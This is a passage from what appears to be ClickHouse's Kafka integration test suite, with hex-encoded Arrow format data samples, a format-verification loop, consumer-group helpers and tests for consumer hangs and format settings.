\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\
x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
],
},
'ArrowStream' : {
'data_sample' : [
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\
x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
],
},
}
for format_name, format_opts in list(all_formats.items()):
logging.debug(('Set up {}'.format(format_name)))
topic_name = 'format_tests_{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
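# formats that support an empty value get an empty message prepended here;
# the offsets used in the verification loop below are shifted by one accordingly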
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = '{format_name}',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name};
'''.format(topic_name=topic_name, format_name=format_name,
extra_settings=format_opts.get('extra_settings') or ''))
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*format_tests_', repetitions=len(all_formats.keys()), look_behind_lines=12000)
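# every format's consumer has committed something; now verify the contents of each format's materialized view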
for format_name, format_opts in list(all_formats.items()):
logging.debug(('Checking {}'.format(format_name)))
topic_name = f'format_tests_{format_name}'
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
kafka_delete_topic(admin_client, topic_name)
# Since everything is async and shaky when receiving messages from Kafka,
# we may want to try and check results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
# https://stackoverflow.com/a/57692111/1555175
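# describe_consumer_group connects to the broker directly (kafka-python BrokerConnection) and returns
# the members of the given consumer group together with their topic/partition assignments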
def describe_consumer_group(kafka_cluster, name):
client = BrokerConnection('localhost', kafka_cluster.kafka_port, socket.AF_INET)
client.connect_blocking()
list_members_in_groups = DescribeGroupsRequest_v1(groups=[name])
future = client.send(list_members_in_groups)
while not future.is_done:
for resp, f in client.recv():
f.success(resp)
(error_code, group_id, state, protocol_type, protocol, members) = future.value.groups[0]
res = []
for member in members:
(member_id, client_id, client_host, member_metadata, member_assignment) = member
member_info = {}
member_info['member_id'] = member_id
member_info['client_id'] = client_id
member_info['client_host'] = client_host
member_topics_assignment = []
for (topic, partitions) in MemberAssignment.decode(member_assignment).assignment:
member_topics_assignment.append({'topic': topic, 'partitions': partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
cluster.start()
kafka_id = instance.cluster.kafka_docker_id
print(("kafka_id is {}".format(kafka_id)))
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
# logging.debug("kafka is available - running test")
yield # run test
# Tests
def test_kafka_issue11308(kafka_cluster):
# Check that the materialized view respects Kafka SETTINGS
kafka_produce(kafka_cluster, 'issue11308', ['{"t": 123, "e": {"x": "woof"} }', '{"t": 123, "e": {"x": "woof"} }',
'{"t": 124, "e": {"x": "test"} }'])
instance.query('''
CREATE TABLE test.persistent_kafka (
time UInt64,
some_string String
)
ENGINE = MergeTree()
ORDER BY time;
CREATE TABLE test.kafka (t UInt64, `e.x` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue11308',
kafka_group_name = 'issue11308',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_flush_interval_ms=1000,
input_format_import_nested_json = 1;
CREATE MATERIALIZED VIEW test.persistent_kafka_mv TO test.persistent_kafka AS
SELECT
`t` AS `time`,
`e.x` AS `some_string`
FROM test.kafka;
''')
while int(instance.query('SELECT count() FROM test.persistent_kafka')) < 3:
time.sleep(1)
result = instance.query('SELECT * FROM test.persistent_kafka ORDER BY time;')
instance.query('''
DROP TABLE test.persistent_kafka;
DROP TABLE test.persistent_kafka_mv;
''')
expected = '''\
123 woof
123 woof
124 test
'''
assert TSV(result) == TSV(expected)
def test_kafka_issue4116(kafka_cluster):
# Check that the format_csv_delimiter parameter now works - as part of all available format settings.
kafka_produce(kafka_cluster, 'issue4116', ['1|foo', '2|bar', '42|answer', '100|multi\n101|row\n103|message'])
instance.query('''
CREATE TABLE test.kafka (a UInt64, b String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue4116',
kafka_group_name = 'issue4116',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
format_csv_delimiter = '|';
''')
result = instance.query('SELECT * FROM test.kafka ORDER BY a;')
expected = '''\
1 foo
2 bar
42 answer
100 multi
101 row
103 message
'''
assert TSV(result) == TSV(expected)
def test_kafka_consumer_hang(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "consumer_hang"
kafka_create_topic(admin_client, topic_name, num_partitions=8)
instance.query(f'''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8;
CREATE TABLE test.view (key UInt64, value UInt64) ENGINE = Memory();
CREATE MATERIALIZED VIEW test.consumer TO test.view AS SELECT * FROM test.kafka;
''')
instance.wait_for_log_line('kafka.*Stalled', repetitions=20)
# This should trigger a heartbeat failure,
# which will cause REBALANCE_IN_PROGRESS,
# which in turn can lead to a consumer hang.
kafka_cluster.pause_container('kafka1')
instance.wait_for_log_line('heartbeat error')
kafka_cluster.unpause_container('kafka1')
# logging.debug("Attempt to drop")
instance.query('DROP TABLE test.kafka')
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# the original problem appeared as the following sequence of messages in the librdkafka logs:
# BROKERFAIL -> |ASSIGN| -> REBALANCE_IN_PROGRESS -> "waiting for rebalance_cb" (repeated forever)
# i.e. librdkafka waited forever for the application to execute the queued rebalance callback
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
# clean up unread messages so Kafka does not wait for the reading consumers before deleting the topic
instance.query(f'''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8;
''')
num_read = int(instance.query('SELECT count() FROM test.kafka'))
logging.debug(f"read {num_read} from {topic_name} before delete")
instance.query('DROP TABLE test.kafka')
kafka_delete_topic(admin_client, topic_name)
def test_kafka_consumer_hang2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "consumer_hang2"
kafka_create_topic(admin_client, topic_name)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64)
